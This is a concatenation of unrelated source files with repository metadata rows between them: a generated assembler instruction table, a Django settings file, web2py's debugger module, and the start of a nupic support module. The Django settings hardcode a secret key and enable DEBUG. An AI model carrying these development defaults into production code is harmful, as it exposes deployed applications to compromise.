form029 = insn_metadata(([0, 1], [2], [1, 2], True, False, [], [], [], False, False))
form030 = insn_metadata(([0, 1], [], [], False, False, [], [], [], False, False))
form031 = insn_metadata(([0], [], [], False, False, [], [], [1], False, False))
form032 = insn_metadata(([], [], [], False, False, [], [], [0], False, False))
form033 = insn_metadata(([0], [1], [0, 1], True, False, [], [], [], False, False))
form034 = insn_metadata(([0, 1], [2], [], True, False, [], ['y'], [], False, False))
form035 = insn_metadata(([0], [2], [], True, False, [], ['y'], [1], False, False))
form036 = insn_metadata(([1], [2], [], True, False, [], ['y'], [0], False, False))
form037 = insn_metadata(([0, 1, 2], [], [], False, False, [], [], [], False, False))
form038 = insn_metadata(([0, 1], [], [], False, False, [], [], [2], False, False))
form039 = insn_metadata(([0, 2], [], [], False, False, [], [], [1], False, False))
form040 = insn_metadata(([1], [], [], False, False, [], [], [0], False, False))
form041 = insn_metadata(([0], [0], [], False, False, [], [], [], False, False))
form042 = insn_metadata(([0, 1], [], [0, 1], True, False, [], [], [], False, False))
form043 = insn_metadata(([0, 1], [2], [], True, False, ['y'], [], [], False, False))
form044 = insn_metadata(([0], [2], [], True, False, ['y'], [], [1], False, False))
form045 = insn_metadata(([1], [2], [], True, False, ['y'], [], [0], False, False))
form046 = insn_metadata(([0, 1], [2], [], False, True, [], [], [], True, False))
form047 = insn_metadata(([0], [1], [], False, True, [], [], [], True, False))
form048 = insn_metadata(([], [1], [], False, True, [], [], [0], True, False))
form049 = insn_metadata(([0], [2], [], False, True, [], [], [1], True, False))
form050 = insn_metadata(([1], [2], [], False, True, [], [], [0], True, False))
form051 = insn_metadata(([0], [1], [1], False, False, [], [], [], False, False))
form052 = insn_metadata(([], [], [], False, True, [], [], [0], True, False))
form053 = insn_metadata(([0, 1, 2], [], [0], False, False, [], [], [], False, False))
form054 = insn_metadata(([0], [1], [0], False, False, [], [], [], False, False))
form055 = insn_metadata(([], [], [], False, True, [15], [], [], True, False))
form056 = insn_metadata(([], [], [], True, False, [], [], [], False, False))
form057 = insn_metadata(([0], [1], [0, 1], False, False, [], [], [], False, False))
form058 = insn_metadata(([], [], [], False, True, [31], [], [], True, False))
form059 = insn_metadata(([], [], [], False, True, [], [15], [0], True, False))
form060 = insn_metadata(([0, 1], [], [], False, True, [], [15], [], True, False))
form061 = insn_metadata(([0], [], [], False, True, [], [15], [], True, False))
form062 = insn_metadata(([0], [], [], False, True, [], [15], [1], True, False))
form063 = insn_metadata(([1], [], [], False, True, [], [15], [0], True, False))
form064 = insn_metadata(([0, 1], [], [], False, True, [], [], [], True, False))
form065 = insn_metadata(([0], [], [], False, True, [], [], [], True, False))
form066 = insn_metadata(([0], [], [], False, True, [], [], [1], True, False))
form067 = insn_metadata(([1], [], [], False, True, [], [], [0], True, False))
form068 = insn_metadata(([0, 1], [], [1], True, False, [], [], [], False, False))
form069 = insn_metadata(([0, 1], [], [0], False, False, [], [], [2], False, False))
form070 = insn_metadata(([0, 2], [], [0], False, False, [], [], [1], False, False))
form071 = insn_metadata(([0], [], [0], False, False, [], [], [1], False, False))
form072 = insn_metadata(([0], [], [], False, False, [], [], [], True, False))
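# Illustrative (assumed example; this table is generated by decode.py):
# "add %r1, %r2, %r3" matches re001 and maps to form001, i.e. operands 0 and 1
# are read and operand 2 is written, with no immediates.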
insninfo = {
'add' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'addcc' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'addx' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'addxcc' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'allocate' : [
(re018, form028),
(re017, form005),
(re020, form026),
],
'allocates' : [
(re018, form028),
(re017, form005),
(re020, form026),
],
'allocatex' : [
(re018, form028),
(re017, form005),
(re020, form026),
],
'and' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'andcc' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'andn' : [
(re001, form001),
(re003, form003),
],
'andncc' : [
(re001, form001),
(re003, form003),
],
'b' : [
(re000, form052),
],
'b,a' : [
(re000, form052),
],
'ba' : [
(re000, form000),
],
'ba,a' : [
(re000, form000),
],
'bcc' : [
(re000, form000),
],
'bcc,a' : [
(re000, form000),
],
'bclr' : [
(re017, form022),
(re020, form023),
],
'bcs' : [
(re000, form000),
],
'bcs,a' : [
(re000, form000),
],
'be' : [
(re000, form000),
],
'be,a' : [
(re000, form000),
],
'beq' : [
(re000, form000),
],
'beq,a' : [
(re000, form000),
],
'bg' : [
(re000, form000),
],
'bg,a' : [
(re000, form000),
],
'bge' : [
(re000, form000),
],
'bge,a' : [
(re000, form000),
],
'bgeu' : [
(re000, form000),
],
'bgeu,a' : [
(re000, form000),
],
'bgt' : [
(re000, form000),
],
'bgt,a' : [
(re000, form000),
],
'bgu' : [
(re000, form000),
],
'bgu,a' : [
(re000, form000),
],
'bl' : [
(re000, form000),
],
'bl,a' : [
(re000, form000),
],
'ble' : [
(re000, form000),
],
'ble,a' : [
(re000, form000),
],
'bleu' : [
(re000, form000),
],
'bleu,a' : [
(re000, form000),
],
'blt' : [
(re000, form000),
],
'blt,a' : [
(re000, form000),
],
'blu' : [
(re000, form000),
],
'blu,a' : [
(re000, form000),
],
'bn' : [
(re000, form000),
],
'bn,a' : [
(re000, form000),
],
'bne' : [
(re000, form000),
],
'bne,a' : [
(re000, form000),
],
'bneg' : [
(re000, form000),
],
'bneg,a' : [
(re000, form000),
],
'bnz' : [
(re000, form000),
],
'bnz,a' : [
(re000, form000),
],
'bpos' : [
(re000, form000),
],
'bpos,a' : [
(re000, form000),
],
'break' : [
(re018, form027),
(re000, form032),
],
'bset' : [
(re017, form022),
(re020, form023),
],
'btog' : [
(re017, form022),
(re020, form023),
],
'btst' : [
(re017, form030),
(re020, form040),
],
'bvc' : [
(re000, form000),
],
'bvc,a' : [
(re000, form000),
],
'bvs' : [
(re000, form000),
],
'bvs,a' : [
(re000, form000),
],
'bz' : [
(re000, form000),
],
'bz,a' : [
(re000, form000),
],
'call' : [
(re000, form059),
(re091, form059),
(re087, form060),
(re092, form060),
(re018, form061),
(re093, form061),
(re088, form062),
(re094, form062),
(re089, form063),
(re095, form063),
(re000, form059),
(re091, form059),
(re018, form061),
(re093, form061),
],
'clr' : [
(re018, form018),
(re018, form018),
(re077, form030),
(re078, form027),
(re079, form031),
(re080, form040),
(re081, form032),
(re078, form027),
],
'clrb' : [
(re077, form030),
(re078, form027),
(re079, form031),
(re080, form040),
(re081, form032),
(re078, form027),
],
'clrh' : [
(re077, form030),
(re078, form027),
(re079, form031),
(re080, form040),
(re081, form032),
(re078, form027),
],
'cmp' : [
(re017, form030),
(re031, form031),
],
'cpop1' : [
(re007, form001),
],
'cpop2' : [
(re007, form001),
],
'create' : [
(re017, form005),
],
'cred' : [
(re020, form015),
],
'crei' : [
(re017, form012),
],
'dec' : [
(re018, form041),
(re020, form023),
],
'deccc' : [
(re018, form041),
(re020, form023),
],
'detach' : [
(re018, form027),
],
'f_alloc' : [
(re018, form018),
],
'f_break' : [
(re002, form002),
(re018, form027),
],
'f_create' : [
(re017, form012),
(re001, form004),
(re031, form014),
(re003, form024),
],
'f_fence' : [
(re017, form030),
(re001, form001),
(re031, form031),
(re003, form003),
(re018, form027),
(re000, form032),
],
'f_freesrb' : [
(re018, form027),
],
'f_get_blockindex' : [
(re017, form017),
(re018, form018),
],
'f_get_blocksize' : [
(re017, form017),
(re018, form018),
],
'f_get_gridsize' : [
(re017, form017),
(re018, form018),
],
'f_mapg' : [
(re001, form001),
(re003, form003),
(re017, form030),
(re031, form031),
],
'f_maphtg' : [
(re001, form001),
(re003, form003),
(re017, form030),
(re031, form031),
],
'f_set_blocksize' : [
(re017, form030),
(re031, form031),
],
'f_set_gridsize' : [
(re017, form030),
(re031, form031),
],
'fabss' : [
(re017, form017),
],
'faddd' : [
(re001, form029),
],
'faddq' : [
(re001, form019),
],
'fadds' : [
(re001, form004),
],
'faddx' : [
(re001, form019),
],
'fb' : [
(re000, form000),
],
'fb,a' : [
(re000, form000),
],
'fba' : [
(re000, form000),
],
'fba,a' : [
(re000, form000),
],
'fbe' : [
(re000, form000),
],
'fbe,a' : [
(re000, form000),
],
'fbg' : [
(re000, form000),
],
'fbg,a' : [
(re000, form000),
],
'fbge' : [
(re000, form000),
],
'fbge,a' : [
(re000, form000),
],
'fbl' : [
(re000, form000),
],
'fbl,a' : [
(re000, form000),
],
'fble' : [
(re000, form000),
],
'fble,a' : [
(re000, form000),
],
'fblg' : [
(re000, form000),
],
'fblg,a' : [
(re000, form000),
],
'fbn' : [
(re000, form000),
],
'fbn,a' : [
(re000, form000),
],
'fbne' : [
(re000, form000),
],
'fbne,a' : [
(re000, form000),
],
'fbnz' : [
(re000, form000),
],
'fbnz,a' : [
(re000, form000),
],
'fbo' : [
(re000, form000),
],
'fbo,a' : [
(re000, form000),
],
'fbu' : [
(re000, form000),
],
'fbu,a' : [
(re000, form000),
],
'fbue' : [
(re000, form000),
],
'fbue,a' : [
(re000, form000),
],
'fbug' : [
(re000, form000),
],
'fbug,a' : [
(re000, form000),
],
'fbuge' : [
(re000, form000),
],
'fbuge,a' : [
(re000, form000),
],
'fbul' : [
(re000, form000),
],
'fbul,a' : [
(re000, form000),
],
'fbule' : [
(re000, form000),
],
'fbule,a' : [
(re000, form000),
],
'fbz' : [
(re000, form000),
],
'fbz,a' : [
(re000, form000),
],
'fcmpd' : [
(re017, form068),
],
'fcmped' : [
(re017, form068),
],
'fcmpeq' : [
(re017, form042),
],
'fcmpes' : [
(re017, form012),
],
'fcmpex' : [
(re017, form042),
],
'fcmpq' : [
(re017, form042),
],
'fcmps' : [
(re017, form012),
],
'fcmpx' : [
(re017, form042),
],
'fdivd' : [
(re001, form029),
],
'fdivq' : [
(re001, form019),
],
'fdivs' : [
(re001, form004),
],
'fdivx' : [
(re001, form019),
],
'fdmulq' : [
(re001, form029),
],
'fdmulx' : [
(re001, form029),
],
'fdtoi' : [
(re017, form054),
],
'fdtoq' : [
(re017, form057),
],
'fdtos' : [
(re017, form054),
],
'fgets' : [
(re003, form024),
],
'fitod' : [
(re017, form051),
],
'fitoq' : [
(re017, form051),
],
'fitos' : [
(re017, form017),
],
'flush' : [
(re087, form012),
(re018, form013),
(re018, form013),
(re000, form016),
(re088, form014),
(re089, form015),
],
'fmovs' : [
(re017, form017),
],
'fmuld' : [
(re001, form029),
],
'fmulq' : [
(re001, form019),
],
'fmuls' : [
(re001, form004),
],
'fmulx' : [
(re001, form019),
],
'fnegs' : [
(re017, form017),
],
'fprintd' : [
(re017, form030),
],
'fprintq' : [
(re017, form021),
],
'fprints' : [
(re017, form030),
],
'fputg' : [
(re090, form038),
],
'fputs' : [
(re090, form038),
],
'fqtod' : [
(re017, form057),
],
'fqtoi' : [
(re017, form054),
],
'fqtos' : [
(re017, form054),
],
'fsmuld' : [
(re001, form007),
],
'fsqrtd' : [
(re017, form033),
],
'fsqrtq' : [
(re017, form033),
],
'fsqrts' : [
(re017, form005),
],
'fsqrtx' : [
(re017, form033),
],
'fstod' : [
(re017, form051),
],
'fstoi' : [
(re017, form017),
],
'fstoq' : [
(re017, form051),
],
'fsubd' : [
(re001, form029),
],
'fsubq' : [
(re001, form019),
],
'fsubs' : [
(re001, form004),
],
'fsubx' : [
(re001, form019),
],
'getcid' : [
(re018, form018),
],
'getfid' : [
(re018, form018),
],
'getpid' : [
(re018, form018),
],
'gets' : [
(re003, form024),
],
'gettid' : [
(re018, form018),
],
'iflush' : [
(re087, form012),
(re018, form013),
(re018, form013),
(re000, form016),
(re088, form014),
(re089, form015),
],
'inc' : [
(re018, form041),
(re020, form023),
],
'inccc' : [
(re018, form041),
(re020, form023),
],
'jmp' : [
(re087, form064),
(re018, form065),
(re088, form066),
(re089, form067),
(re000, form052),
(re018, form065),
],
'jmpl' : [
(re084, form046),
(re017, form047),
(re017, form047),
(re020, form048),
(re085, form049),
(re086, form050),
],
'launch' : [
(re018, form072),
],
'ld' : [
(re007, form004),
(re008, form005),
(re009, form024),
(re010, form025),
(re011, form026),
(re008, form005),
(re007, form004),
(re008, form005),
(re009, form024),
(re010, form025),
(re011, form026),
(re008, form005),
(re021, form012),
(re022, form013),
(re023, form014),
(re024, form015),
(re025, form016),
(re022, form013),
(re012, form012),
(re013, form013),
(re014, form014),
(re015, form015),
(re016, form016),
(re013, form013),
(re026, form012),
(re027, form013),
(re028, form014),
(re029, form015),
(re030, form016),
(re027, form013),
],
'lda' : [
(re004, form004),
(re005, form005),
],
'ldbp' : [
(re018, form018),
],
'ldd' : [
(re007, form007),
(re008, form008),
(re009, form009),
(re010, form010),
(re011, form011),
(re008, form008),
(re007, form007),
(re008, form008),
(re009, form009),
(re010, form010),
(re011, form011),
(re008, form008),
(re012, form012),
(re013, form013),
(re014, form014),
(re015, form015),
(re016, form016),
(re013, form013),
],
'ldda' : [
(re004, form004),
(re005, form005),
],
'ldfp' : [
(re018, form018),
],
'ldsb' : [
(re007, form004),
(re008, form005),
(re009, form024),
(re010, form025),
(re011, form026),
(re008, form005),
],
'ldsba' : [
(re004, form004),
(re005, form005),
],
'ldsh' : [
(re008, form005),
(re007, form004),
(re009, form024),
(re010, form025),
(re011, form026),
(re008, form005),
],
'ldsha' : [
(re004, form004),
(re005, form005),
],
'ldstub' : [
(re007, form004),
(re008, form005),
(re009, form024),
(re010, form025),
(re011, form026),
(re008, form005),
],
'ldstuba' : [
(re004, form004),
(re005, form005),
],
'ldub' : [
(re007, form004),
(re008, form005),
(re009, form024),
(re010, form025),
(re011, form026),
(re008, form005),
],
'lduba' : [
(re004, form004),
(re005, form005),
],
'lduh' : [
(re007, form004),
(re008, form005),
(re009, form024),
(re010, form025),
(re011, form026),
(re008, form005),
],
'lduha' : [
(re004, form004),
(re005, form005),
],
'mov' : [
(re032, form030),
(re033, form031),
(re034, form030),
(re035, form031),
(re036, form030),
(re037, form031),
(re038, form030),
(re039, form031),
(re040, form030),
(re041, form031),
(re042, form018),
(re043, form018),
(re044, form018),
(re045, form018),
(re046, form018),
(re047, form027),
(re048, form032),
(re047, form027),
(re049, form027),
(re050, form032),
(re049, form027),
(re051, form027),
(re052, form032),
(re051, form027),
(re053, form027),
(re054, form032),
(re053, form027),
(re055, form027),
(re056, form032),
(re055, form027),
(re017, form017),
(re020, form006),
(re017, form017),
(re017, form017),
],
'mulscc' : [
(re001, form043),
(re003, form044),
],
'neg' : [
(re017, form017),
(re018, form041),
],
'nop' : [
(re002, form002),
],
'not' : [
(re017, form017),
(re018, form041),
],
'or' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'orcc' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'orn' : [
(re001, form001),
(re003, form003),
],
'orncc' : [
(re001, form001),
(re003, form003),
],
'print' : [
(re017, form030),
(re031, form031),
],
'putg' : [
(re090, form038),
],
'puts' : [
(re090, form038),
],
'r_allocsrb' : [
(re017, form017),
(re020, form006),
],
'r_read' : [
(re017, form005),
],
'r_write' : [
(re017, form012),
(re001, form004),
(re031, form014),
(re003, form024),
],
'rd' : [
(re042, form018),
(re043, form018),
(re044, form018),
(re045, form018),
(re106, form006),
(re046, form018),
],
'release' : [
(re018, form027),
],
'restore' : [
(re001, form001),
(re002, form002),
(re003, form003),
(re002, form002),
],
'ret' : [
(re002, form055),
],
'retl' : [
(re002, form058),
],
'rett' : [
(re087, form064),
(re018, form065),
(re088, form066),
(re089, form067),
(re000, form052),
(re000, form052),
(re018, form065),
],
'save' : [
(re001, form001),
(re003, form003),
(re002, form002),
],
'sdiv' : [
(re001, form043),
(re003, form044),
(re019, form045),
],
'sdivcc' : [
(re001, form043),
(re003, form044),
(re019, form045),
],
'set' : [
(re006, form006),
],
'setblock' : [
(re017, form030),
(re031, form031),
],
'sethi' : [
(re020, form006),
],
'setlimit' : [
(re017, form030),
(re031, form031),
],
'setstart' : [
(re017, form030),
(re031, form031),
],
'setstep' : [
(re017, form030),
(re031, form031),
],
'setthread' : [
(re017, form030),
(re031, form031),
],
'sll' : [
(re001, form001),
(re003, form003),
],
'smul' : [
(re001, form034),
(re003, form035),
(re019, form036),
],
'smulcc' : [
(re001, form034),
(re003, form035),
(re019, form036),
],
'spill' : [
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
],
'spilld' : [
(re057, form053),
(re058, form021),
(re059, form069),
(re060, form070),
(re061, form071),
(re058, form021),
],
'sra' : [
(re001, form001),
(re003, form003),
],
'srl' : [
(re001, form001),
(re003, form003),
],
'st' : [
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
(re062, form030),
(re063, form027),
(re064, form031),
(re065, form040),
(re066, form032),
(re063, form027),
(re067, form030),
(re068, form027),
(re069, form031),
(re070, form040),
(re071, form032),
(re068, form027),
(re072, form030),
(re073, form027),
(re074, form031),
(re075, form040),
(re076, form032),
(re073, form027),
],
'sta' : [
(re082, form037),
(re083, form030),
],
'stb' : [
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
],
'stba' : [
(re082, form037),
(re083, form030),
],
'stbar' : [
(re002, form056),
],
'std' : [
(re057, form053),
(re058, form021),
(re059, form069),
(re060, form070),
(re061, form071),
(re058, form021),
(re096, form030),
(re097, form027),
(re098, form031),
(re099, form040),
(re100, form032),
(re097, form027),
(re057, form053),
(re058, form021),
(re059, form069),
(re060, form070),
(re061, form071),
(re058, form021),
(re101, form030),
(re102, form027),
(re103, form031),
(re104, form040),
(re105, form032),
(re102, form027),
(re062, form030),
(re063, form027),
(re064, form031),
(re065, form040),
(re066, form032),
(re063, form027),
],
'stda' : [
(re082, form053),
(re083, form021),
],
'sth' : [
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
],
'stha' : [
(re082, form037),
(re083, form030),
],
'stsb' : [
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
],
'stsba' : [
(re082, form037),
(re083, form030),
],
'stsh' : [
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
],
'stsha' : [
(re082, form037),
(re083, form030),
],
'stub' : [
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
],
'stuba' : [
(re082, form037),
(re083, form030),
],
'stuh' : [
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
],
'stuha' : [
(re082, form037),
(re083, form030),
],
'sub' : [
(re001, form001),
(re003, form003),
],
'subcc' : [
(re001, form001),
(re003, form003),
],
'subx' : [
(re001, form001),
(re003, form003),
],
'subxcc' : [
(re001, form001),
(re003, form003),
],
'swap' : [
(re007, form004),
(re008, form005),
(re009, form024),
(re010, form025),
(re011, form026),
(re008, form005),
],
'swapa' : [
(re004, form004),
(re005, form005),
],
'sync' : [
(re017, form005),
],
't_allochtg' : [
(re001, form001),
(re003, form003),
(re001, form004),
(re003, form024),
],
't_end' : [
(re002, form002),
],
't_freehtg' : [
(re018, form027),
],
't_get_fid' : [
(re018, form018),
],
't_get_pindex' : [
(re018, form018),
],
't_get_tid' : [
(re018, form018),
],
't_wait' : [
(re002, form002),
(re018, form027),
],
'taddcc' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'taddcctv' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'tst' : [
(re018, form027),
(re018, form027),
(re018, form027),
],
'tsubcc' : [
(re001, form001),
(re003, form003),
],
'tsubcctv' : [
(re001, form001),
(re003, form003),
],
'udiv' : [
(re001, form043),
(re003, form044),
(re019, form045),
],
'udivcc' : [
(re001, form043),
(re003, form044),
(re019, form045),
],
'umul' : [
(re001, form034),
(re003, form035),
(re019, form036),
],
'umulcc' : [
(re001, form034),
(re003, form035),
(re019, form036),
],
'unimp' : [
(re000, form032),
],
'wr' : [
(re032, form030),
(re033, form031),
(re047, form027),
(re034, form030),
(re035, form031),
(re049, form027),
(re036, form030),
(re037, form031),
(re051, form027),
(re038, form030),
(re039, form031),
(re053, form027),
(re040, form030),
(re041, form031),
(re055, form027),
],
'xnor' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'xnorcc' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'xor' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'xorcc' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
}
| gpl-3.0 | 3,683,968,049,073,578,000 | 25.209459 | 183 | 0.426605 | false |
LavaLabUSC/application-review | review/settings.py | 1 | 2875 | import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'k2m-60hm+%6w%0jalqd5-m2%fe0zc2or!&-)c502bd34q-i047'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'webview',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
# 'review.middleware.LoginRequiredMiddleware',
]
ROOT_URLCONF = 'review.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'review.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
LOGIN_URL = '/admin/'
| mit | 4,462,475,505,393,296,000 | 24.669643 | 91 | 0.678609 | false |
xiang12835/python_web | py2_web2py/web2py/gluon/debug.py | 1 | 5583 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
| This file is part of the web2py Web Framework
| Developed by Massimo Di Pierro <[email protected]>,
| limodou <[email protected]> and srackham <[email protected]>.
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
Debugger support classes
------------------------
"""
import logging
import pdb
import sys
from gluon._compat import Queue
logger = logging.getLogger("web2py")
class Pipe(Queue.Queue):
def __init__(self, name, mode='r', *args, **kwargs):
self.__name = name
Queue.Queue.__init__(self, *args, **kwargs)
def write(self, data):
logger.debug("debug %s writing %s" % (self.__name, data))
self.put(data)
def flush(self):
# mark checkpoint (complete message)
logger.debug("debug %s flushing..." % self.__name)
self.put(None)
# wait until it is processed
self.join()
logger.debug("debug %s flush done" % self.__name)
def read(self, count=None, timeout=None):
logger.debug("debug %s reading..." % (self.__name, ))
data = self.get(block=True, timeout=timeout)
# signal that we are ready
self.task_done()
logger.debug("debug %s read %s" % (self.__name, data))
return data
def readline(self):
logger.debug("debug %s readline..." % (self.__name, ))
return self.read()
pipe_in = Pipe('in')
pipe_out = Pipe('out')
debugger = pdb.Pdb(completekey=None, stdin=pipe_in, stdout=pipe_out,)
def set_trace():
"""breakpoint shortcut (like pdb)"""
logger.info("DEBUG: set_trace!")
debugger.set_trace(sys._getframe().f_back)
def stop_trace():
"""stop waiting for the debugger (called atexit)"""
    # this should prevent communicate() from waiting forever for a command
    # result after the main thread has finished
logger.info("DEBUG: stop_trace!")
pipe_out.write("debug finished!")
pipe_out.write(None)
#pipe_out.flush()
def communicate(command=None):
"""send command to debbuger, wait result"""
if command is not None:
logger.info("DEBUG: sending command %s" % command)
pipe_in.write(command)
#pipe_in.flush()
result = []
while True:
data = pipe_out.read()
if data is None:
break
result.append(data)
logger.info("DEBUG: result %s" % repr(result))
return ''.join(result)
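# Illustrative sketch, not part of the original module: how another thread
# might drive the pdb-over-pipes debugger above. The helper name is ours and
# the session assumes some application thread has already hit set_trace().
def _example_pdb_session():
    stack_listing = communicate('where')     # pdb's textual stack listing
    resume_output = communicate('continue')  # resume the paused thread
    return stack_listing, resume_output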
# New debugger implementation using dbg and a web UI
import gluon.contrib.dbg as c_dbg
from threading import RLock
interact_lock = RLock()
run_lock = RLock()
def check_interaction(fn):
"""Decorator to clean and prevent interaction when not available"""
def check_fn(self, *args, **kwargs):
interact_lock.acquire()
try:
if self.filename:
self.clear_interaction()
return fn(self, *args, **kwargs)
finally:
interact_lock.release()
return check_fn
class WebDebugger(c_dbg.Frontend):
"""Qdb web2py interface"""
def __init__(self, pipe, completekey='tab', stdin=None, stdout=None):
c_dbg.Frontend.__init__(self, pipe)
self.clear_interaction()
def clear_interaction(self):
self.filename = None
self.lineno = None
self.exception_info = None
self.context = None
# redefine Frontend methods:
def run(self):
run_lock.acquire()
try:
while self.pipe.poll():
c_dbg.Frontend.run(self)
finally:
run_lock.release()
def interaction(self, filename, lineno, line, **context):
# store current status
interact_lock.acquire()
try:
self.filename = filename
self.lineno = lineno
self.context = context
finally:
interact_lock.release()
def exception(self, title, extype, exvalue, trace, request):
self.exception_info = {'title': title,
'extype': extype, 'exvalue': exvalue,
'trace': trace, 'request': request}
@check_interaction
def do_continue(self):
c_dbg.Frontend.do_continue(self)
@check_interaction
def do_step(self):
c_dbg.Frontend.do_step(self)
@check_interaction
def do_return(self):
c_dbg.Frontend.do_return(self)
@check_interaction
def do_next(self):
c_dbg.Frontend.do_next(self)
@check_interaction
def do_quit(self):
c_dbg.Frontend.do_quit(self)
def do_exec(self, statement):
interact_lock.acquire()
try:
# check to see if we're inside interaction
if self.filename:
# avoid spurious interaction notifications:
self.set_burst(2)
# execute the statement in the remote debugger:
return c_dbg.Frontend.do_exec(self, statement)
finally:
interact_lock.release()
# create the connection between threads:
parent_queue, child_queue = Queue.Queue(), Queue.Queue()
front_conn = c_dbg.QueuePipe("parent", parent_queue, child_queue)
child_conn = c_dbg.QueuePipe("child", child_queue, parent_queue)
web_debugger = WebDebugger(front_conn) # frontend
dbg_debugger = c_dbg.Qdb(pipe=child_conn, redirect_stdio=False, skip=None) # backend
dbg = dbg_debugger
# enable getting context (stack, globals/locals) at interaction
dbg_debugger.set_params(dict(call_stack=True, environment=True))
import gluon.main
gluon.main.global_settings.debugging = True
| apache-2.0 | -3,998,305,188,738,329,600 | 27.484694 | 86 | 0.605409 | false |
tomsilver/nupic | nupic/support/__init__.py | 1 | 25825 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
## @file
Internal package.
Package containing modules that are used internally by Numenta Python
tools and plugins to extend standard library functionality.
These modules should NOT be used by client applications.
The following modules are included:
nupic.support.paths
Module containing filesystem path manipulation utilities.
nupic.support.serialization
Module containing Python object serialization (pickling and unpickling) and
versioning utilities.
nupic.support.compress
Module containing Python object encoding and compression utilities.
nupic.support.processes
Module containing operating system process management utilities and wrappers.
nupic.support.output
Module containing operating system interprocess communication utilities and
wrappers.
nupic.support.diff
Module containing file difference calculation wrappers.
nupic.support.vision
Temporary location for vision framework before the move to nupic.vision.
nupic.support.deprecate
Contains the deprecate decorator used for automatic handling of deprecated
methods.
nupic.support.memchecker
Contains the MemChecker class, for checking physical memory and monitoring
memory usage.
nupic.support.imagesearch
Contains functions for searching for images on the web and downloading them.
"""
from __future__ import with_statement
# Standard imports
import os
import sys
import inspect
import logging
import logging.config
import logging.handlers
from platform import python_version
import struct
from StringIO import StringIO
import time
import traceback
from pkg_resources import resource_string, resource_filename
from configuration import Configuration
from nupic.support.fshelpers import makeDirectoryFromAbsolutePath
# Local imports
#############################################################################
def getCallerInfo(depth=2):
"""Utility function to get information about function callers
The information is the tuple (function/method name, filename, class)
The class will be None if the caller is just a function and not an object
method.
depth: how far back in the callstack to go to extract the caller info
"""
f = sys._getframe(depth)
method_name = f.f_code.co_name
filename = f.f_code.co_filename
